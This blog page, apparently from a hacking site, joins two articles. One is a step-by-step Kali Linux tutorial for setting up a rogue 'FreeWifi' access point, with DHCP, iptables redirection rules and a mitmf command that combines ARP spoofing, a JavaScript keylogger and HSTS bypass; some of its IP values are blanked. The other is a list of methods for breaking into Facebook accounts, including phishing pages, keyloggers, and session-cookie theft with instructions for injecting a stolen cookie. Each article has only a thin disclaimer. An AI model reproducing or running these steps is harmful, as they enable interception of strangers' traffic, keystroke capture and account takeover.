A rogue access point (also called rogue AP), is any Wi-Fi access point that is installed on a network but is not authorized for operation on that network and is not under the management of the network administrator. Rogue access points often do not conform to wireless LAN (WLAN) security policies, and additionally, can allow anyone with a Wi-Fi device to connect to your network. So, Learn How To Create Rogue Access Point For Attack In Kali Linux.

Create Rogue Access Point For Attack In Kali Linux

Let’s Understand The Rogue Access Point With Infographics

rogue access point

Steps To Create Rogue Access Point For Attack In Kali Linux

1. Install isc-dhcp-server

apt-get install isc-dhcp-server

2. set monitor mode

airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon

3. Configure dhcpd.conf

leafpad /etc/dhcp/dhcpd.conf
default-lease-time 700;
max-lease-time 8000;
subnet netmask {
option routers;
option subnet-mask;
option domain-name “FreeWifi”;
option domain-name-servers 61.XXX.XXX.1,61.XXX.XXX.1,;

4. Create fake AP using airbase-ng

airbase-ng -e FreeWifi -c 6 wlan0mon

5. Configure at0 interface

ifconfig at0 up
ifconfig at0 netmask
ifconfig at0 mtu 1400
route add -net netmask gw
iptables –flush
iptables –table nat –flush
iptables –delete-chain
iptables –table nat –delete-chain
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT –to
iptables –append FORWARD –in-interface at0 -j ACCEPT
iptables –table nat –append POSTROUTING –out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-port 10000

6. Start DHCP Server

dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start

7. Run mitmf

mitmf -i at0 –spoof –arp –gateway –jskeylogger –hsts

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

So, Hope HACKAGON have provided one of the best way to Create Rogue Access Point For Attack. And if you like this article then don’t forget to share it with your friends and always feel free to drop a comment below if you have any query or feedback.

Everybody is so much familiar with facebook and also about its huge amount of data storage. Facebook is one of the most widely used social networking sites, with more than 750 million users, as a reason if which it has become the number one target of hackers. So, HACKAGON will show the Best ways to Hack Facebook so that the readers of HACKAGON will stay aware from hackers and protect their facebook account from getting hacked.

Best ways to Hack Facebook Hackagon

So, know the top 10 methods of How Hackers Can Hack Facebook Account Password:

1# Phishing:

Phishing is the most popular assault vector utilized for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks, a hacker creates a fake login page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim logs in through the fake page the, the victims credentials like “Email Address” and “Password” is stored into a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.

To make it simple, let’s say that facebook phishing is a way to make and create fake facebook website according to the real website for negative purposes, such as stealing credentials, data, etc.

2# Keylogging:

A keylogger is a suspicious program that record your keystrokes, Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once installed on victim’s computer, will record everything victim types on his/her computer. The logs are then sent back to the attacker by either FTP or directly to hackers email address. Some advanced keylogger’s are also there which can even take the screenshot of the victim’s desktop.

3# Stealers:

Almost 80% percent of facebook users uses stored password in their browser to access the Facebook. This is quite convenient, but can sometimes be extremely dangerous. Stealers are software specially designed to capture the saved passwords stored in the victim’s Internet browser.

4# Session Hijacking & Cookie Stealing:

Session Hijacking & Cookie Stealing can be exceptionally perilous if you are accessing Facebook on an HTTP (nonsecure) connection. In Session Hijacking attack, a hacker steals the victim’s browser cookie which is used to authenticate the user on a website and use it to access the victims account. Session hijacking is widely used on LAN and WiFi connections.

The cookie which facebook uses to authenticate its users is called “Datr”, If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain access to your account. This is how a facebook authentication cookie looks like:
Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;

An attacker can use a variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain access to victims account or If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called Firesheep in order to capture authentication cookie and gain access to victims account.

5# Sidejacking:

Sidejacking attack is basically another name for HTTP session hijacking, but it’s more targeted towards WiFi users. It went common in late 2010, however, it’s still popular nowadays.

Sidejacking Attack Involves two Major Steps:

  • Capturing packets (Session Cookie): There are a wide variety of tools available that can Sniff packets containing “session cookies“. Use any packet sniffer such as Wireshark to sniff the packets between the target IP and the host. These tools can capture packets such as POST or GET requests used by Web browsers to send and receive data from the HOST. But we are mainly interested in grabbing the cookies, so carefully take out the cookie information from the sniffed Packets. Popular packet Sniffers: WireShark, Ethereal, etc.
  • Using Captured Session Cookie: Once you have the cookie information, the next task is to use this information to get access to victims user account. Using Sniffed Cookie you can actually log into your victims account even without knowing his/her password. To do this, you will require browser plugin that can manage and edit cookies. For firefox Browser, you can use Cookie Manager+ or Edit Cookies to do this task. Chrome users can checkout: Edit This Cookie or Cookie Manager.

To simplify this Task, Mr.Eric Butler a software engineer introduced a firefox extension called Firesheep. It is widely used to carry out sidejacking attacks but it only works when the attacker and victim are on the same WiFi network.

6# Mobile Phone Hacking:

Besides PC/Laptops, Billions of Facebook users access Facebook through their Smartphones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. There are a bunch of Mobile Spying software’s used to monitor a Cellphone. The most popular Mobile Phone Spying software’s are:

  • Mobile Spy
  • Spy Phone Gold.

7# DNS Spoofing:

In DNS Spoofing attack if both, the victim and attacker are on the same network then an attacker can use a DNS spoofing attack and change the original Facebook page to his own fake page and hence can get access to victims Facebook account.

Basically, DNS spoofing (or DNS cache poisoning) is a computer hacking attack, whereby data is introduced into a Domain Name System (DNS) resolver’s cache, causing the name server to return an incorrect IP address, diverting traffic to the attacker’s computer (or any other computer).

8# USB Hacking:

In USB Hacking attacks, if an attacker has physical access to your computer, he could just insert a programmed USB with a function to automatically extract saved passwords in the Internet browser.

For USB Hacking attack you need two things:

  • A USB Drive devoted to this.
  • The programs and files with the capability of consequently concentrating the spared passwords.

9# Man In the Middle Attack:

In Man In The Middle Attack, if the victim and attacker are on the same LAN and on a switch based network then a hacker can place himself between the client and the server, or he could act as a default gateway and hence capturing all the traffic in between.

Basically, In cryptography and computer security, A Man In The Middle Attack (often abbreviated to MITM, MitM, MIM, MiM or MITMA) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other.

10# Botnet:

Botnets are not commonly used for hacking Facebook accounts, because of it’s high setup costs. They are used to carry more advanced attacks. A Botnet is basically a collection of compromised computer. The infection process is same as the key logging, however, a Botnet gives you additional options for carrying out attacks with the compromised computer. Some of the most popular Botnets include Spyeye and Zeus.

Basically, A botnet is a collection of compromised computers often referred to as “zombies” infected with malware that allows an attacker to control them.

Note: – This guide is only for knowledge purpose and shouldn’t be used for any illegal activities as we are not responsible for anything happens with this.

Hope you like this article. So, don’t forget to share it with your friends and also feel free to drop a comment below if you still have any query or update related to this.